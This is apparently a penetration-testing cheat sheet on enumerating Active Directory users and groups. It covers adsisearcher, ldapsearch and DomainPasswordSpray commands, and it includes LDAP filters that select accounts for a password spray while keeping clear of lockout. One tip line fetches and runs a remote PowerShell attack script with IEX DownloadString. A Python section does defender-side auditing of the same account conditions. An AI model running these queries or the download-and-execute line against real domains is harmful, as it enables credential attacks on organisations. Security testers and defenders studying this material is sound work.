Enumerate Users & Groups

adsisearcher

Perform any standard LDAP query against the Active Directory database from a domain-joined computer.

([adsisearcher]"(&(objectCategory=person)(objectClass=user)(samaccountname=*))").FindAll().Properties.samaccountname

Combine this base query with other useful LDAP filters to fine-tune your search:

Filter                                                            Description
userAccountControl:1.2.840.113556.1.4.803:=2                      Disabled account
!(userAccountControl:1.2.840.113556.1.4.803:=2)                   Enabled account
userAccountControl:1.2.840.113556.1.4.803:=65536                  Password never expires
badpwdcount<=[LOCKOUT THRESHOLD - 2]                              At least 1 failed attempt left (get lockout threshold)
admincount=1                                                      Objects protected by AdminSDHolder (what is that?)
memberof=CN=Domain Admins,CN=Users,DC=domain,DC=example,DC=org    Member of Domain Admins

Tip

Password Spray: ([adsisearcher]"(&(objectCategory=person)(objectClass=user)(samaccountname=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(badpwdcount<=1)(userAccountControl:1.2.840.113556.1.4.803:=65536)))").FindAll().Properties.samaccountname

Note

Enumerate Groups: ([adsisearcher]"(&(objectClass=group)(samaccountname=*))").FindAll().Properties | % { Write-Host $_.samaccountname : $_.description }

Reference: social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx
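The userAccountControl filters in the table rely on the bitwise-AND extensible match rule (OID 1.2.840.113556.1.4.803). The Python below is an added example, not part of the original cheat sheet: it implements that rule (and its OR counterpart, 1.2.840.113556.1.4.804), then runs a defender-side audit over constructed sample accounts, flagging the conditions those filters select for and measuring the footprint a spray leaves in badPwdCount (a per-DC, non-replicated attribute that is only aggregated on the PDC emulator).

```python
from dataclasses import dataclass

# Well-known userAccountControl bits used by the filters above.
ACCOUNTDISABLE = 0x0002        # 2
DONT_EXPIRE_PASSWORD = 0x10000  # 65536


def bit_and(value: int, mask: int) -> bool:
    """LDAP_MATCHING_RULE_BIT_AND (1.2.840.113556.1.4.803): every bit in mask is set."""
    return (value & mask) == mask


def bit_or(value: int, mask: int) -> bool:
    """LDAP_MATCHING_RULE_BIT_OR (1.2.840.113556.1.4.804): at least one bit in mask is set."""
    return (value & mask) != 0


@dataclass
class Account:
    sam: str            # sAMAccountName
    uac: int            # userAccountControl
    bad_pwd_count: int  # badPwdCount as read from the PDC emulator
    admin_count: int = 0


# Constructed sample data (not from any real domain).
SAMPLE = [
    Account("alice", 512, 1),                  # NORMAL_ACCOUNT
    Account("bob", 514, 0),                    # 512 | ACCOUNTDISABLE
    Account("svc_backup", 66048, 1),           # 512 | DONT_EXPIRE_PASSWORD
    Account("da_admin", 512, 1, admin_count=1),
    Account("carol", 512, 0),
]


def audit(accounts):
    """Hygiene findings for enabled accounts, keyed by sAMAccountName."""
    findings = {}
    for a in accounts:
        if bit_and(a.uac, ACCOUNTDISABLE):
            continue  # disabled accounts cannot authenticate at all
        issues = []
        if bit_and(a.uac, DONT_EXPIRE_PASSWORD):
            issues.append("password-never-expires")
        if a.admin_count == 1:
            issues.append("adminsdholder-protected")
        if issues:
            findings[a.sam] = issues
    return findings


def spray_ratio(accounts):
    """Share of enabled accounts with a failed logon: many accounts with a
    low count each is the signature of one guess per account below lockout."""
    enabled = [a for a in accounts if not bit_and(a.uac, ACCOUNTDISABLE)]
    hit = [a for a in enabled if a.bad_pwd_count > 0]
    return len(hit) / len(enabled) if enabled else 0.0
```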

DomainPasswordSpray.ps1

Generate a list of all users in the domain ready for a password spray attack by automatically removing disabled accounts and those that are about to be locked out.

Get-DomainUserList -RemoveDisabled -RemovePotentialLockouts

Tip

IEX (New-Object System.Net.WebClient).DownloadString('https://github.com/dafthack/DomainPasswordSpray/raw/master/DomainPasswordSpray.ps1')

Source: github.com/dafthack/DomainPasswordSpray

ldapsearch

Perform any standard LDAP query against the Active Directory database from outside the domain using valid credentials.

SASL authentication:

ldapsearch -H ldap[s]://<IP>:[PORT] -U <USERNAME> -LL -E pr=1000/noprompt -b 'dc=<EXAMPLE>,dc=<ORG>' -s sub '(&(objectCategory=person)(objectClass=user)(sAMAccountName=*))' [OUTPUT ATTRIBUTE]

Simple authentication (the password crosses the wire in cleartext unless ldaps:// is used):

ldapsearch -x -W -H ldap[s]://<IP>:[PORT] -D <USERNAME> -LL -E pr=1000/noprompt -b 'dc=<EXAMPLE>,dc=<ORG>' -s sub '(&(objectCategory=person)(objectClass=user)(sAMAccountName=*))' [OUTPUT ATTRIBUTE]

Combine this base query with the other useful LDAP filters from the adsisearcher section to fine-tune your search.

Tip

Password Spray: ldapsearch -H ldap[s]://<IP>:[PORT] -U <USERNAME> -LL -E pr=1000/noprompt -b 'dc=<EXAMPLE>,dc=<ORG>' -s sub '(&(objectCategory=person)(objectClass=user)(samaccountname=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(badpwdcount<=1)(userAccountControl:1.2.840.113556.1.4.803:=65536)))' sAMAccountName | grep sAMAccountName | cut -d' ' -f2

ADExplorer

Perform recon from a computer outside the domain using the credentials of a standard user. See the Sysinternals page for details.